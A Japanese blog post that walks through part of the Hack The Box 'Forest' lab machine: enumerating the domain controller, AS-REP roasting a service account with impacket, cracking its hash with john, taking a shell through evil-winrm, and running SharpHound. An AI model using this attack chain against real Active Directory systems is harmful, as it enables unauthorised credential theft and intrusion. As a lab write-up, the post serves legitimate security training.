ペンギン技術 blog

CTFのWriteupなどを記載していこうと思います

Hack The Box Writeup Forest(途中user.txtの取得まで)

Hack The Box

■準備 HTBのサイトにログイン ovpnファイルをHTBのサイトからダウンロードしておく

VPNで接続

$ sudo openvpn lab_xxxxx1.ovpn
(略)
2021-07-16 21:36:53 net_route_v4_add: 10.10.10.0/23 via 10.10.16.1 dev [NULL] table 0 metric -1
(略)
2021-07-16 22:01:20 Preserving previous TUN/TAP instance: tun0
2021-07-16 22:01:20 Initialization Sequence Completed

「Initialization Sequence Completed」で止まったらOK
別のターミナルを開いてコマンドを実行していく

■問題
Forest
https://app.hackthebox.eu/machines/Forest

参考
https://qiita.com/v_avenger/items/43014e5e34fe491764c8

■情報収集(NW)

$ nmap -sV -sT -sC 10.10.10.161
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-17 03:29 EDT
Nmap scan report for 10.10.10.161
Host is up (0.55s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-17 07:49:25Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h39m08s, deviation: 4h02m32s, median: 19m06s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2021-07-17T00:49:50-07:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-07-17T07:49:48
|_  start_date: 2021-07-16T05:25:15

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.64 seconds

■情報収集

$ enum4linux   10.10.10.161
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jul 17 03:33:01 2021
(略)
 =============================
|    Users on 10.10.10.161    |
 =============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA  Name: (null)    Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00020010 Account: Administrator  Name: Administrator     Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy  Name: Andy Hislip       Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1  Name: HealthMailbox-EXCH01-010  Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e  Name: HealthMailbox-EXCH01-003  Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678  Name: HealthMailbox-EXCH01-005  Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e  Name: HealthMailbox-EXCH01-009  Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781  Name: HealthMailbox-EXCH01-006  Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d  Name: HealthMailbox-EXCH01-004  Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64  Name: HealthMailbox-EXCH01-008  Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9  Name: HealthMailbox-EXCH01-002  Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722  Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013        Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad  Name: HealthMailbox-EXCH01-001  Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238  Name: HealthMailbox-EXCH01-007  Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda       Name: Lucinda Berger    Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark  Name: Mark Brandt       Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez   Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien     Name: Sebastien Caron   Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb  Name: Microsoft Exchange Migration      Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb  Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}     Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb  Name: Microsoft Exchange Approval Assistant   Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18  Name: Discovery Search Mailbox  Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a  Name: Microsoft Exchange        Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb  Name: E4E Encryption Store - Active     Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549  Name: Microsoft Exchange Federation Mailbox   Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b  Name: Microsoft Exchange        Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b  Name: Microsoft Exchange        Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco  Name: svc-alfresco      Desc: (null)

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

 =========================================
(略)

ASREPRoast攻撃が有効らしい

https://book.hacktricks.xyz/windows/active-directory-methodology/asreproast

ASREPRoast攻撃は、Kerberosの事前認証必須属性(DONT_REQ_PREAUTH)を持たないユーザを探します。 つまり、誰もがそれらのユーザに代わってDCにAS_REQリクエストを送信し、 AS_REPメッセージを受け取ることができるということです。

ASREPRoast攻撃に使用するツール(GetNPUsers.py)をダウンロード
$ wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetNPUsers.py

試しに動かしてみるが、モジュール(impacket)がないらしく、動かない
$ python3 GetNPUsers.py --help ModuleNotFoundError: No module named 'impacket.examples.utils'

$ pip --version
pip 20.3.4 from /usr/lib/python3/dist-packages/pip (python 3.9)

impacketは入っているらしいので、一度アンインストールする
→消すものがないらしい。この環境、大丈夫?
$ pip uninstall impacket Found existing installation: impacket 0.9.22 Not uninstalling impacket at /usr/lib/python3/dist-packages, outside environment /usr Can't uninstall 'impacket'. No files were found to uninstall.

必要なモジュール(impacket)をダウンロード
git clone https://github.com/CoreSecurity/impacket.git

cd impacket

vi setup.py  
#!/usr/bin/env python  #!/usr/bin/env python3

impacketをインストール
$ sudo python3 setup.py install

$ python3 GetNPUsers.py --help Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

usage: GetNPUsers.py [-h] [-request] [-outputfile OUTPUTFILE] [-format {hashcat,john}] [-usersfile USERSFILE] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] target

ユーザー名が必要なので、enum4linuxの「 Users on 10.10.10.161 」の結果を保存
$ cat users_forest.txt user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] :

[と]を区切り文字として、ユーザ名を取り出す
$ cat users_forest.txt | cut -d "[" -f 2 | cut -d "]" -f 1 > usernames_forest.txt

$ cat usernames_forest.txt Administrator Guest :

ドメイン名を指定(Domain name: htb.local)
-usersfile ユーザー名一覧を指定
-format johnで解析できる形式で出力
-outputfile 結果を出力するファイル名(なんでもいい)

$ python3 GetNPUsers.py HTB.local/ -usersfile usernames_forest.txt -format john -outputfile output_forest.txt -no-pass -dc-ip 10.10.10.161
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
(略)
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax

失敗かと思われたが、output_forest.txtに出力あり

$ cat output_forest.txt
$krb5asrep$svc-alfresco@HTB.LOCAL:d93839684eb654739ffa7(略)

ユーザ「svc-alfresco」のハッシュ値が取れているようだ

ハッシュ値をjohnコマンドで解析(辞書はrockyou.txt)

$ john output_forest.txt --wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 512/512 AVX512BW 16x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$svc-alfresco@HTB.LOCAL)
1g 0:00:00:03 DONE (2021-07-26 16:33) 0.2770g/s 1131Kp/s 1131Kc/s 1131KC/s s521379846..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

判明したパスワードは「s3rvice」

資格情報が得られたので、WinRMで接続できるか確かめる

$ nmap -p 5985 10.10.10.161
PORT     STATE SERVICE
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 0.89 seconds

ポートは空いている
WS-Management (WSMan)≒WinRM という感じらしい

https://yanor.net/wiki/?PowerShell/%E3%83%AA%E3%83%A2%E3%83%BC%E3%83%88%E6%8E%A5%E7%B6%9A/%E3%83%AA%E3%83%A2%E3%83%BC%E3%83%88%E6%8E%A5%E7%B6%9A%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AE%E3%82%B5%E3%83%BC%E3%83%93%E3%82%B9%E3%81%A8%E3%83%97%E3%83%AD%E3%83%88%E3%82%B3%E3%83%AB+WinRM%E3%81%A8WS-MAN WinRMとWS-MAN

| クライアントPC

↓ WS-MAN(HTTP)

| リモートPC
| ↓
| WinRM
| ↓

| PowerShell

接続に使うツールをインストール
$ sudo gem install winrm winrm-fs colorize stringio

$ git clone https://github.com/Hackplayers/evil-winrm.git cd evil-winrm

WinRMで接続

./evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v3.0
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

フラグを表示

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type C:\Users\svc-alfresco\Desktop\user.txt
e5e*********************************ed

1つ目のフラグが取れた

Windows Active Directory環境の分析をBloodHoundというツールで行う
Active Directory環境の関係性がわかり、Domain Adminsを取る手掛かりとなる情報が得られるとのこと

ローカルにダウンロード
$ cd evil-winrm
$ wget https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1

攻略対象マシンにアップロードして、実行

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> upload SharpHound.ps1
Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Import-module ./SharpHound.ps1

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Invoke-BloodHound -CollectionMethod ACL,ObjectProps,Default -NoSaveCache
※-CompressData -RemoveCSVはエラーとなったので指定を外した

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir

    Directory: C:\Users\svc-alfresco\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/26/2021   1:44 AM          15361 20210726014448_BloodHound.zip ★結果
-a----        7/26/2021   1:41 AM         974235 SharpHound.ps1
-ar---        9/23/2019   2:16 PM             32 user.txt

結果ファイルをダウンロード

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> download 20210726014448_BloodHound.zip
Info: Download successful!

「Download successful!」だが、なぜかローカルにダウンロードされていない・・・
ツールの不具合なのか?
いったんここまで